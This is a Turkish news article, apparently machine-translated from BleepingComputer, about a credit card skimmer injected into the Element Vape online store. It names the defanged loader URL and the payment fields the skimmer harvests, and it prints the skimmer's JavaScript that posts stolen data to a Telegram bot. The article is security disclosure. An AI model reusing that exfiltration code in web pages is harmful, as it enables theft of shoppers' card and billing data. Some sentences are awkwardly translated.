BleepingComputer, önde gelen çevrimiçi e-sigara ve vaping kitleri satıcısı Element Vape’in, muhtemelen saldırıya uğradıktan sonra, canlı sitesinde bir kredi kartı skimmer hizmeti verdiğini doğruladı.
Saldırı, ifşa edildiği gün bu rapor aracılığıyla çözüldü, ancak müşterilerin herhangi bir şüpheli kredi kartı işlemine karşı tetikte olmaları tavsiye ediliyor.
ABD ve Kanada’daki varlığı ile Element Vape, hem perakende satış noktalarında hem de çevrimiçi mağazalarında e-sigara, vaping cihazları, e-sıvılar ve CBD ürünleri satmaktadır.
Kötü amaçlı komut dosyası, kredi kartlarını gözden geçirir
Element Vape’in web sitesi, bugün BleepingComputer tarafından görüldüğü gibi, kredi kartı hırsızı içeren bir üçüncü taraf web sitesinden kötü amaçlı bir JavaScript dosyası yüklüyordu.
Komut dosyaları enjekte ederek bu tür kredi kartı hırsızlarını e-ticaret mağazalarında kullanan tehdit aktörleri olarak adlandırılır. Sihirbaz.
Ana sayfadan başlayarak mağazanın birden çok web sayfası, aşağıda gösterilen HTML kaynak kodunun 45-50 satırlarında görülebilen belirsiz bir base64 kodlu komut dosyası içeriyordu:
Kötü amaçlı komut dosyasının ElementVape.com’da ne kadar süredir bulunduğu tam olarak bilinmiyor.
Wayback Machine’deki ElementVape.com analizimiz, kötü amaçlı kodun mevcut olmayan 5 Şubat 2022 ve öncesinden itibaren. Bu nedenle, enfeksiyonun daha yeni olduğu, tarihten bir süre sonra ortaya çıktığı ve yazının yazıldığı sırada hala etkin olduğu görülüyor.
Kodu çözüldüğünde, bu altı satır, üçüncü taraf bir sitede barındırılan aşağıdaki JavaScript dosyasını çeker:
//weicowire[.]com/js/jquery/frontend.js
Ağır şekilde gizlenmiş kötü niyetli yük, bu ön uç.js sonuna doğru dosya:
Komut dosyası, ödeme verilerini Telegram aracılığıyla sızdırıyor
Yukarıdaki komut dosyasının kodu çözüldüğünde ve BleepingComputer tarafından analiz edildiğinde, ödeme sırasında müşterilerin ödeme kartı ve fatura bilgilerini topladığı görüldü.
Komut dosyasının aradığı alanlardan bazıları şunlardır: e-posta adresi, ödeme kartı numarası/son kullanma tarihi, telefon numarası, sokak ve posta kodu dahil fatura adresi.
Bu bilgi daha sonra, komut dosyasında bulunan karmaşık, sabit kodlanmış bir Telegram adresi aracılığıyla saldırgana aktarılır:
var x = new XMLHttpRequest();
x.open("POST", "https://api.telegram.org/bot"+tbot+"/sendMessage", true);
x.setRequestHeader('Content-Type', 'application/json; charset=utf-8');
x.withCredentials = false;
var dd = JSON.stringify({
chat_id: tchat,
text: tmessage
});
x.send(dd);
Ayrıca, komut dosyası, korumalı alan ortamında mı yoksa “geliştiriciler“analizi caydırmak için.
Büyük ama belirsiz e-sigara perakendecisi
ElementVape.com’un arka uç kodunun, kötü amaçlı komut dosyasına gizlice girmek için ilk etapta nasıl değiştirildiği açık değil.
Ve bu, Element Vape’in ilk kez tehlikeye atılışı değil.
2018’de Element Vape müşterileri, şirketten bir veri ihlali meydana geldiğini ve “6 Aralık 2017 ile 27 Haziran 2018 arasındaki izinsiz giriş penceresinin” müşterilerin kişisel bilgilerini potansiyel olarak tehdit aktörlerine maruz bıraktığını belirten mektuplar aldıklarını bildirdi. Öğe Vape onaylanmış iddialar şirketin Reddit hesabı gibi görünüyor.
Bu olayın ardından, Illinois merkezli tüketici Artur Tyksinski dava açmak Element Vape, vaping perakendecisinin “veri ihlalinden etkilenen kişilere zamanında bildirimde bulunmadığını” ve müşterilerin gizli bilgilerine yetkisiz erişimi önlemek için yeterli prosedürlere sahip olmadığını iddia etti. Bunu bir sınıf eylemi izledi dava 2019’da jüri tarafından yargılanma talebinde bulundu.
sözde olmasına rağmen”dünyanın en büyük çevrimiçi Vape perakendecilerinden biriPerakende mağazalarında ve çevrimiçi olarak e-sigaraların sayısı, Element Vape hakkında çok fazla şey bilinmiyor.
olarak bilinir TheSY LLC Bazı eyaletlerde, Element Vape’in Twitter hesabı 13.000’den fazla kullanıcıyı takip ediyor.
Ancak, garip bir şekilde, tweet’leri korunuyor ve bu da perakendeci ile etkileşimi zorlaştırıyor.
Web sitesine göre şirket, California’da bulunuyor ve 2013’ten beri faaliyet gösteriyor.
“Kişisel felsefemiz, tüketicilere ödediklerinden daha fazlasını vermektir. Beklentileri aşmak için tavizsiz bir dürtüyle, yardım etmeye kararlıyız. [sic] Müşteriler mümkün olan en iyi alışveriş deneyimini yaşıyor”, diyor Element Vape’in web sitesi.
Geçen yıl şirket, e-sigaralarını ve elektronik sigara ürünlerini Kanada’nın PUDOpoint Sayaçlarında “alınabilir” hale getirmek için PUDO (Alma veya Bırakma) Inc. ile ortaklık kurdu.
BleepingComputer, sorunu Element Vape’e bildirdi. Zendesk destek sitesianalizimiz sırasında kötü amaçlı komut dosyasını içermiyor gibi görünüyordu.
Kullanıcılar mağazada aktif olarak alışveriş yapıyor olabileceğinden, devam eden bu saldırıyla ilgili ayrıntıları paylaşmanın ve müşterilerin finansal bilgilerinin çalınmasını önlemenin kamu yararına olduğuna inanıyoruz.
Element Vape’den henüz haber alamamış olsak da, kötü amaçlı kod, açıklandığı gün web sitelerinden kaldırıldı.
Element Vape’in hızlı yanıtı olağandışıdır, çünkü çoğu durumda kötü amaçlı komut dosyalarının virüslü sitelerden kaldırılması haftalar olmasa da günler alır.
Düzenleme 18 Şubat, 15:35 ET: Enfeksiyonun 5 Şubat’tan bir süre sonra meydana geldiği ve bugün hala aktif olduğu açıklandı. Element Vape, bugün daha önce görülen altı satırlı kötü amaçlı kodu kaldırmış görünüyor. Ancak, daha fazla bilgi elde edilene kadar kullanıcılar dikkatli olmaya devam etmelidir.
20 Şubat, 11:15 ET: Saldırının artık aktif olmadığını ve aynı gün çözüldüğünü belirtmek için başlık ve son bölüm güncellendi.
İhbar için isimsiz bir okuyucuya teşekkürler.